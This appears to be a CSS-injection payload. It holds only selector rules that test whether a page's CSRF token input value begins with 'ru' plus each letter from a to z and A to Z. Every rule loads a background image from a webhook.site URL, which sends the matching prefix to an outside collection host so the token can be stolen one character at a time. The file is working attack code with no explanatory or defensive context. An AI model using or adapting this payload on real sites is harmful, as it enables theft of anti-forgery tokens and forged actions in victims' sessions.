input[name=csrf][value^=rua]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rua);
}
input[name=csrf][value^=rub]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rub);
}
input[name=csrf][value^=ruc]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruc);
}
input[name=csrf][value^=rud]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rud);
}
input[name=csrf][value^=rue]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rue);
}
input[name=csrf][value^=ruf]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruf);
}
input[name=csrf][value^=rug]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rug);
}
input[name=csrf][value^=ruh]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruh);
}
input[name=csrf][value^=rui]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rui);
}
input[name=csrf][value^=ruj]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruj);
}
input[name=csrf][value^=ruk]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruk);
}
input[name=csrf][value^=rul]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rul);
}
input[name=csrf][value^=rum]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rum);
}
input[name=csrf][value^=run]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/run);
}
input[name=csrf][value^=ruo]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruo);
}
input[name=csrf][value^=rup]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rup);
}
input[name=csrf][value^=ruq]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruq);
}
input[name=csrf][value^=rur]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rur);
}
input[name=csrf][value^=rus]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rus);
}
input[name=csrf][value^=rut]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rut);
}
input[name=csrf][value^=ruu]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruu);
}
input[name=csrf][value^=ruv]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruv);
}
input[name=csrf][value^=ruw]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruw);
}
input[name=csrf][value^=rux]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/rux);
}
input[name=csrf][value^=ruy]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruy);
}
input[name=csrf][value^=ruz]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruz);
}
input[name=csrf][value^=ruA]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruA);
}
input[name=csrf][value^=ruB]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruB);
}
input[name=csrf][value^=ruC]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruC);
}
input[name=csrf][value^=ruD]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruD);
}
input[name=csrf][value^=ruE]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruE);
}
input[name=csrf][value^=ruF]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruF);
}
input[name=csrf][value^=ruG]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruG);
}
input[name=csrf][value^=ruH]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruH);
}
input[name=csrf][value^=ruI]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruI);
}
input[name=csrf][value^=ruJ]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruJ);
}
input[name=csrf][value^=ruK]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruK);
}
input[name=csrf][value^=ruL]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruL);
}
input[name=csrf][value^=ruM]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruM);
}
input[name=csrf][value^=ruN]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruN);
}
input[name=csrf][value^=ruO]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruO);
}
input[name=csrf][value^=ruP]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruP);
}
input[name=csrf][value^=ruQ]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruQ);
}
input[name=csrf][value^=ruR]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruR);
}
input[name=csrf][value^=ruS]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruS);
}
input[name=csrf][value^=ruT]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruT);
}
input[name=csrf][value^=ruU]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruU);
}
input[name=csrf][value^=ruV]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruV);
}
input[name=csrf][value^=ruW]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruW);
}
input[name=csrf][value^=ruX]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruX);
}
input[name=csrf][value^=ruY]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruY);
}
input[name=csrf][value^=ruZ]{
    background-image: url(https://webhook.site/52ee0a4d-39a5-49e7-9997-089ab1c6bb7e/ruZ);
}
